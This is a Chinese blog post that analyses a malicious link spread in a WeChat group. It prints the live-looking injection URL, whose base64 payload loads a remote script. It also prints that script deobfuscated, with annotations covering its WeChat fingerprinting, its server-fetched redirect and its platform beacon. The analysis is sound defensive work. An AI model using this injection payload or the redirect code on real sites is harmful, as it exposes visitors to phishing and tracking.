群裡的一個惡意連結分析過程

劉俊濤的部落格發表於2021-01-19

 

群裡有這樣一個連結，因為是防疫群，是不可能邀請大家參加婚禮的。

於是乎好奇的點選了,然而瀏覽器並沒有反應。

複製了連結，發現是這樣一個奇怪的地址：

https://xxxx.com/mall/index.html?click_type=768123%27;setTimeout(atob(%27dmFyIHNzID0gZG9jdW1lbnQxY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7IHNzLnNyYyA9ICIvL3F3ZTEyMzMyMS5vc3MtY24tYmVpamluZy5hbGl5dW5jcy5jb20vanMvbXNnMjEuanMiOyBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoc3MpOw==%27)%2c1);//

 

%27 轉碼後 '

%2c1 轉碼後 ,1

setTimeout( , 1)：延遲 1 毫秒後執行（第二個參數的單位是毫秒）

atob( )：base64 解碼函式

解碼後是一段會在頁面中插入 <script> 標籤、載入以下 js 地址的程式碼：http://xxxxxx.oss-cn-beijing.aliyuncs.com/js/msg21.js

 

開啟後發現是一個經過混淆（加密）的 JS

因為是 V5 js 加密的，這塊沒有接觸過。JS 的內容無法知道，但作者既然不想讓人看到，程式碼裡面肯定沒有幹好事。至於是盜號、推廣還是廣告，就不得而知。

 

如此一來：陌生連結、具有誘惑性的連結，不要點。

 

當然，這種包含惡意的連結，平臺也會很快遮蔽。

以後有機會可以研究一下js解密。

 

更新一下

__________________________________________

解密後的JS

  1 (function () {
        // Analyst annotations (review): this IIFE is the payload loaded by the injected
        // <script>. Read end-to-end it (a) extracts query parameters, (b) checks whether
        // the page runs inside WeChat (UA contains "micromessenger") on a platform whose
        // navigator.platform starts with neither "Win" nor "Mac", with WeChat version >= 7,
        // (c) on a match fetches a base64-encoded URL from a remote endpoint and navigates
        // to it through a programmatic <a rel="noreferrer"> click, and (d) otherwise POSTs
        // navigator.platform to a random "<id>.xml" path and clicks "#". Identifiers are
        // obfuscator output; the comments name each one's role. Detection-wise, the
        // noreferrer anchor click to a fetched+atob() URL and the form-encoded POST to a
        // random ".xml" path are the observable behaviours.
  2     var _0xaeeadd = {
            // Lookup table emitted by the obfuscator: string constants plus tiny helper
            // functions that stand in for operators and calls.
  3         'fKPML': function _0x14f0f0(_0x5c3713, _0x1a63d4) {
  4             return _0x5c3713 + _0x1a63d4; // string concatenation
  5         },
  6         'QCLsm': '(^|&)', // regex fragment: start of a query parameter
  7         'KhmkX': '=([^&]*)(&|$)', // regex fragment: value capture (group 2)
  8         'pkwUU': function _0x32d898(_0xc21c09, _0x5cb8e1) {
  9             return _0xc21c09(_0x5cb8e1); // f(x)
 10         },
 11         'NImgf': function _0x33b8ae(_0x482fe5, _0x29be10) {
 12             return _0x482fe5 === _0x29be10; // strict equality
 13         },
 14         'MnKMf': 'Win', // navigator.platform prefixes tested below
 15         'FNPcq': 'Mac',
 16         'MiFij': function _0x354ab1(_0x1c1e1b, _0x1383fa) {
 17             return _0x1c1e1b && _0x1383fa; // logical AND
 18         },
 19         'xlxNW': 'uYi', // opaque-predicate constant: compared with 'FTI' below, never equal
 20         'HlNCM': function _0xb671d6(_0x5415a8) {
 21             return _0x5415a8(); // f()
 22         },
 23         'xbyII': function _0x430a35(_0x4d7c9d, _0x138736) {
 24             return _0x4d7c9d < _0x138736; // less-than
 25         },
 26         'PggWd': 'POST', // beacon request method and header
 27         'pmkHt': 'Content-Type',
 28         'DqzsN': 'application/x-www-form-urlencoded',
 29         'VfEeh': 'rel', // anchor attributes used for the redirect
 30         'VjhJK': 'noreferrer',
 31         'CPxCm': 'href',
 32         'dsBeQ': 'type', // query parameter names read by _0x5ee876
 33         'FVmgL': function _0x1ec231(_0x598e3f, _0x42ad76) {
 34             return _0x598e3f(_0x42ad76); // f(x)
 35         },
 36         'swpDV': 'sid',
 37         'DIwHW': 'aid',
 38         'fSiTS': function _0x3f03f3(_0x2009ea, _0x990f9) {
 39             return _0x2009ea(_0x990f9); // f(x)
 40         },
 41         'iKdOU': 'https://xxxx/zhuanfa/index/getUrl4', // endpoint whose response is the redirect target (host masked by the author)
 42         'iijAp': 'https://www.xxx.xx', // base URL for the POST beacon (host masked by the author)
 43         'SRGif': function _0x5aeb01(_0x3cabc9) {
 44             return _0x3cabc9(); // f()
 45         },
 46         'OyAtk': function _0x3c3206(_0x2d909a) {
 47             return _0x2d909a(); // f()
 48         },
 49         'EysgW': 'dev', // property probed on the result of _0x3aae30() in the "dev mode" branch
 50         'WtgwP': '【開發模式】', // console message, roughly "[development mode]"
 51         'RECbh': function _0x54cbc9(_0x2eebf6) {
 52             return _0x2eebf6(); // f()
 53         },
 54         'IWljf': 'vvT', // opaque-predicate constant: compared with 'Cgo' below, never equal
 55         'EAyvE': function _0x26768c(_0x4b9384) {
 56             return _0x4b9384(); // f()
 57         },
 58         'MBeJk': function _0x695c5e(_0x5e669c) {
 59             return _0x5e669c(); // f()
 60         }
 61     };
 62 
        // Query-parameter reader: returns the value of parameter `_0x542f79` from
        // location.search (case-insensitive regex, unescape() applied to the value), or
        // null when absent. When called with no argument the parameter name becomes the
        // string "null", so the regex then looks for a parameter literally named "null".
 63     function _0x3aae30(_0x542f79 = null) {
 64         var _0x529546 = new RegExp(_0xaeeadd['fKPML'](_0xaeeadd['QCLsm'], _0x542f79) + _0xaeeadd['KhmkX'], 'i'); // (^|&)<name>=([^&]*)(&|$)
 65         var _0x31b98d = window['location']['search']['substr'](0x1)['match'](_0x529546); // substr(1) drops the leading "?"
 66         if (_0x31b98d != null) return _0xaeeadd['pkwUU'](unescape, _0x31b98d[0x2]); // capture group 2 is the value
 67         return null;
 68     }
 69 
        // WeChat-on-mobile check: true only when the lowercased UA contains
        // "micromessenger" and navigator.platform starts with neither "Win" nor "Mac".
        // The inner else-branch is dead: 'FTI' !== 'uYi' is always true, so every
        // non-matching client returns false.
 70     function _0x12824a() {
 71         const _0x162822 = navigator['platform'];
 72         const _0x175089 = _0xaeeadd['NImgf'](_0x162822['indexOf'](_0xaeeadd['MnKMf']), 0x0); // platform starts with "Win"
 73         const _0xae94b8 = _0x162822['indexOf'](_0xaeeadd['FNPcq']) === 0x0; // platform starts with "Mac"
 74         const _0x3dcc2c = /micromessenger/ ['test'](navigator['userAgent']['toLowerCase']()); // WeChat built-in browser UA marker
 75         if (_0xaeeadd['MiFij'](_0x3dcc2c, !_0x175089) && !_0xae94b8) {
 76             return !![]; // true
 77         } else {
 78             if ('FTI' !== _0xaeeadd['xlxNW']) {
 79                 return ![]; // false
 80             } else {
                    // unreachable (opaque predicate); obfuscator filler that mirrors the real fallback path
 81                 _0xaeeadd['HlNCM'](_0x72f538);
 82                 _0xaeeadd['pkwUU'](_0x191d64, '#');
 83             }
 84         }
 85     }
 86 
        // WeChat version gate: starting 15 (0xf) characters after the "micromessenger"
        // match in the lowercased UA — presumably just past "micromessenger/" — collects
        // digits and dots, parseFloat()s them and returns true when the result is >= 7.
        // Returns false for any UA without "micromessenger".
 87     function _0x775b3a() {
 88         const _0x4f64dc = navigator['userAgent']['toLowerCase']();
 89         const _0x1860d3 = /micromessenger/;
 90         let _0x53b8bc = ![]; // false
 91         if (_0x1860d3['test'](_0x4f64dc)) {
 92             const _0x1b8303 = _0x4f64dc['search'](_0x1860d3); // index of "micromessenger"
 93             let _0x244c59 = '';
 94             for (let _0xa894d5 = _0x1b8303 + 0xf; _0xaeeadd['xbyII'](_0xa894d5, _0x4f64dc['length']); _0xa894d5++) {
 95                 const _0x55e4d3 = _0x4f64dc[_0xa894d5];
 96                 if (/^\d{1,}$/ ['test'](_0x55e4d3) || _0xaeeadd['NImgf'](_0x55e4d3, '.')) { // keep digits and '.'
 97                     _0x244c59 += _0x55e4d3;
 98                 } else {
 99                     break; // first other character ends the version string
100                 }
101             }
102             _0x244c59 = parseFloat(_0x244c59); // e.g. "7.0.12" -> 7 (parseFloat stops at the second '.')
103             if (_0x244c59 >= 0x7) _0x53b8bc = !![]; // major version >= 7
104         }
105         return _0x53b8bc;
106     }
107     var _0x320916 = _0xaeeadd['iijAp']; // beacon base URL
108 
        // Beacon: asynchronous form-encoded POST of "platform=<navigator.platform>" to
        // <base>/<random id>.xml. `_0x1f1b99` is the const declared near the bottom of
        // this IIFE; it is initialised before this function is first invoked.
109     function _0x72f538() {
110         var _0x31ca84 = new XMLHttpRequest();
111         _0x31ca84['open'](_0xaeeadd['PggWd'], _0x320916 + '/' + _0x1f1b99 + '.xml', !![]); // POST, async = true
112         _0x31ca84['setRequestHeader'](_0xaeeadd['pmkHt'], _0xaeeadd['DqzsN']); // Content-Type: application/x-www-form-urlencoded
113         _0x31ca84['send']('platform=' + navigator['platform']); // only navigator.platform is sent here
114     }
115 
        // Navigation helper: creates <a rel="noreferrer" href="<_0x2d7909>">, appends it
        // to <body> and dispatches click(). rel="noreferrer" means the destination does
        // not receive a Referer pointing back at the page that hosted this script.
116     function _0x191d64(_0x2d7909) {
117         const _0xe8c4a5 = document['createElement']('a');
118         _0xe8c4a5['setAttribute'](_0xaeeadd['VfEeh'], _0xaeeadd['VjhJK']); // rel="noreferrer"
119         _0xe8c4a5['setAttribute'](_0xaeeadd['CPxCm'], _0x2d7909); // href
120         document['body']['appendChild'](_0xe8c4a5);
121         _0xe8c4a5['click']();
122     }
123 
        // Redirect path for matching WeChat clients: reads the type/sid/aid query
        // parameters, fetches the (masked) getUrl4 endpoint, base64-decodes the response
        // text and navigates to it via _0x191d64. `_0x2b07b8` (the rebuilt
        // "?type=..&aid=.." string) and `_0x52e6be` (sid) are computed but never used, so
        // the redirect target comes solely from the server response. The fetch chain has
        // no .catch(); a network or decode error rejects silently.
124     function _0x5ee876() {
125         const _0x507d4c = _0x3aae30(_0xaeeadd['dsBeQ']); // ?type=
126         const _0x52e6be = _0xaeeadd['FVmgL'](_0x3aae30, _0xaeeadd['swpDV']); // ?sid= (unused)
127         const _0x3b61df = _0x3aae30(_0xaeeadd['DIwHW']); // ?aid=
128         let _0x2b07b8 = '';
129         if (_0x507d4c) {
130             _0x2b07b8 = '?type=' + _0x507d4c + '&aid=' + _0x3b61df; // built but never sent
131         }
132         _0xaeeadd['fSiTS'](fetch, _0xaeeadd['iKdOU'])['then'](_0x2f8c1a => _0x2f8c1a['text']())['then'](_0x147f1f =>
133             _0x191d64(atob(_0x147f1f))); // response body is a base64-encoded URL
134     }
135     const _0x1f1b99 = Math['random']()['toString'](0x24)['substr'](0x2); // random base-36 id for the beacon path
        // Dispatch. Clients that are not WeChat-on-mobile, or run WeChat < 7, get the
        // beacon and a no-op "#" click; WeChat >= 7 on mobile gets the redirect.
136     if (!_0x12824a() || !_0xaeeadd['SRGif'](_0x775b3a)) {
137         const _0xa26fef = _0xaeeadd['OyAtk'](_0x3aae30); // _0x3aae30() with no argument: looks up a parameter named "null"
138         if (_0xa26fef && _0xa26fef[_0xaeeadd['EysgW']]) { // "dev" property of a string (or null) is undefined, so this looks like a dead dev-mode leftover
139             console['log'](_0xaeeadd['WtgwP']);
140             _0xaeeadd['OyAtk'](_0x5ee876);
141         } else {
142             _0xaeeadd['RECbh'](_0x72f538); // beacon
143             _0x191d64('#'); // click on "#": no navigation away from the page
144         }
145     } else {
146         if (_0xaeeadd['NImgf'](_0xaeeadd['IWljf'], 'Cgo')) { // 'vvT' === 'Cgo' is always false
147             console['log'](_0xaeeadd['WtgwP']); // unreachable
148             _0xaeeadd['EAyvE'](_0x5ee876);
149         } else {
150             _0xaeeadd['MBeJk'](_0x5ee876); // fetch the redirect target and navigate
151         }
152     }
153 }());;
154 (function (_0xe5cddc, _0xb8de6b, _0x4ff679) {
        // Anti-tamper stub emitted by the jsjiami.com v5 obfuscator; not part of the
        // payload logic. Invoked with window only, so _0xb8de6b and _0x4ff679 start out
        // undefined and are used as scratch variables. As listed here, the global
        // `encode_version` is assigned on the line after this stub; read in that order the
        // global is still undeclared when the check runs and the catch-branch alert would
        // fire — presumably the original script assigns it earlier.
155     var _0x1b14d7 = {
156         'Kyljy': 'undefined',
157         'syTvc': 'jsjiami.com.v5', // expected value of the global encode_version
158         'GkGtd': '刪除版本號,js會定期彈窗' // "version marker removed, this js will pop up periodically"
159     };
160     _0x4ff679 = 'al';
161     try {
162         _0x4ff679 += 'ert'; // assembles "alert" so the call does not show up as a literal
163         _0xb8de6b = encode_version; // throws ReferenceError if the global is not declared
164         if (!(typeof _0xb8de6b !== _0x1b14d7['Kyljy'] && _0xb8de6b === _0x1b14d7['syTvc'])) {
165             _0xe5cddc[_0x4ff679]('刪除' + '版本號,js會定期彈窗,還請支援我們的工作'); // window.alert(...)
166         }
167     } catch (_0x3249a0) {
168         _0xe5cddc[_0x4ff679](_0x1b14d7['GkGtd']); // window.alert(...)
169     }
170 }(window));;
171 encode_version = 'jsjiami.com.v5' // implicit global (no var/let/const) that the anti-tamper stub above reads; declared this way on purpose so the stub's typeof check sees it

 

這個 js 後面對應有一個 TP 後臺，對應有非常多的域名；至於這個後臺收集什麼資訊，就不扒了，水平有限。

 

 
